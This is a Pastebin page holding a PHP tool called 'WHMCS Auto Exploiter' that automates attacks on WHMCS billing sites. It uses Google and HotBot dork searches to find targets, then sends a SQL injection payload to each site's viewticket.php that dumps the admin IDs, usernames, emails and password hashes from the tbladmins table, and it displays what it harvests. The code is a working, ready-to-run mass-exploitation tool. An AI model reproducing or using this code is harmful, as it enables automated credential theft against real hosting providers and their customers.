API tools faq
paste
Advertisement
bug7sec

Auto Exploit whmcs (google + hotbot)

bug7sec
Mar 21st, 2016
1,793
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.44 KB | None | 0 0
raw download clone embed print report
  1. <!--
  2. name : Auto Exploit whmcs (google + hotbot)
  3. author : shor7cut
  4. link : http://facebook.com/bug7sec
  5. -->
  6.  
  7. <!DOCTYPE html>
  8. <html>
  9. <head>
  10.     <title>WHMCS Auto Exploiter</title>
  11.     <style type="text/css">
  12.         body{
  13.             background-color: black;
  14.             color: white;
  15.         }
  16.         textarea{
  17.             margin: 0px; width: 680px;
  18.             height: 226px;
  19.             BORDER: dashed 1px #333;
  20.             BORDER-COLOR: #333333;
  21.             BACKGROUND-COLOR: Black;
  22.             color: #FFF;
  23.             margin-top: 30px;
  24.         }
  25.         input{
  26.             border: dashed 1px;
  27.             border-color: #333;
  28.             BACKGROUND-COLOR: Black;
  29.             font: 8pt Verdana;
  30.             color: Red;
  31.         }
  32.     </style><link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  33. </head>
  34. <body>
  35.  
  36.  
  37.                 <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  38.                 <br><font color="white" size="4">[For WHMCS ver. &lt;= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font></font>
  39.                 <form method="post">
  40.                     <textarea name="ids"></textarea><br>
  41.                     <input type="submit" value="whmcs hunter" id="button">
  42.                 </form>
  43.     <center>
  44. <?php
  45. error_reporting(0);
  46. set_time_limit(0);
  47. class shc_hotbot
  48. {
  49.     function letItBy(){
  50.         ob_flush(); flush();
  51.     }
  52. function parseUrl($url) {
  53.     $r  = "^(?:(?P<scheme>\w+)://)?";
  54.     $r .= "(?:(?P<login>\w+):(?P<pass>\w+)@)?";
  55.     $r .= "(?P<host>(?:(?P<subdomain>[\w\.]+)\.)?" . "(?P<domain>\w+\.(?P<extension>\w+)))";
  56.     $r .= "(?::(?P<port>\d+))?";
  57.     $r .= "(?P<path>[\w/]*/(?P<file>\w+(?:\.\w+)?)?)?";
  58.     $r .= "(?:\?(?P<arg>[\w=&]+))?";
  59.     $r .= "(?:#(?P<anchor>\w+))?";
  60.     $r = "!$r!";                                                // Delimiters
  61.    
  62.     preg_match ( $r, $url, $out );
  63.    
  64.     return $out;
  65. }
  66.     function keyvol(){
  67.         $ch = curl_init("http://www.hotbot.com/");
  68.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  69.         $result = curl_exec($ch);
  70.         curl_close($ch);
  71.         preg_match("/\.val\('(.*?)'\);/",$result,$ke);
  72.         return $ke[1];
  73.     }
  74.  
  75.     function search_hotbot($dork){
  76.         echo '[+] Search Target ... Pleas wait<br>';
  77.         $page = 1;
  78.         for ($i=0; $i<$page; $i++) {
  79.            
  80.             $ch = curl_init();
  81.             curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  82.             curl_setopt($ch,CURLOPT_URL,"http://www.hotbot.com/search/web?pn=".$page."&q=".$dork."&keyvol=".$this->keyvol());
  83.             curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt');
  84.             curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt');
  85.             curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+http://search.msn.com/msnbot.htm)');
  86.             curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress");
  87.             $data   = curl_exec($ch);
  88.             preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches);
  89.             preg_match('/<title>(.*?)<\\/title>/', $data, $titles);
  90.             $links  = array_unique($matches[1]);
  91.             if($titles[1]=="Search"){
  92.         echo '[+] Search Target ... Done!<br>';
  93.             }else{
  94.                 foreach ($links as $key) {
  95.                     echo $key."<br>";
  96.                     $array[] = $key;
  97.                 }
  98.                     $page++;
  99.             }
  100.                 $this->letItBy();
  101.         }
  102.                 return $array;
  103.     }
  104.  
  105.     function search_google($dork){
  106.         $resultPerPage=8;
  107.         $page=1;
  108.         for ($i=0; $i <$page; $i++) {
  109.             $start = $page*$resultPerPage;
  110.             $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($dork);
  111.             $resultFromGoogle = json_decode( file_get_contents($url, true) ,true);
  112.             if($resultFromGoogle['responseStatus']=="200"){
  113.            
  114.             foreach ($resultFromGoogle['responseData']['results'] as $key => $value) {
  115.                 $url = $this->parseUrl($value['unescapedUrl']);
  116.                 $url = str_replace($url['file'], "viewticket.php", $url[0]);
  117.                 $array[] = $url;
  118.             }
  119.                 $page++;
  120.             }
  121.  
  122.         }
  123.         return array_unique($array);
  124.     }
  125.  
  126.     function whmcs($site){
  127.         $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  128.         $curl_connection = curl_init($site);
  129.         if($curl_connection != false) {
  130.         curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  131.         curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  132.         curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  133.         curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  134.         curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  135.         curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  136.         $source = curl_exec($curl_connection);
  137.         preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  138.         if($infoz[1]){
  139.             return $infoz[1];
  140.         }
  141.         }
  142.             return false;
  143.         }
  144.  
  145.     function whmcs_exploit($data){
  146.         foreach ($data as $key => $values) {
  147.        
  148.             $exploit = $this->whmcs($values);
  149.             if($exploit){
  150.                 echo '<div style="background-color: green;"><pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre><br><textarea>';
  151.                 foreach ($exploit as $key => $value) {
  152.                     echo $value."\r\n";
  153.                 }
  154.                 echo '</textarea></div>';
  155.             }else{
  156.                 echo '
  157.                     <div style="background-color: red;">
  158.                         <pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre>
  159.                     </div>';
  160.             }
  161.         $this->letItBy();
  162.     }
  163.    
  164.     }
  165.  
  166. }
  167. $shc = new shc_hotbot();
  168. //$data = $shc->search("inurl:submitticket.php");
  169.  
  170. if($_POST['ids']){
  171.     $anu = explode("\r\n", $_POST['ids']);
  172.     foreach ($anu as $key => $value) {
  173.         $data = $shc->search_google($value);
  174.         $shc->whmcs_exploit($data);
  175.         $shc->letItBy();
  176.     }
  177.  
  178. }
  179.  
  180. ?> 
  181.  
  182.     </center>
  183. </body>
  184. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!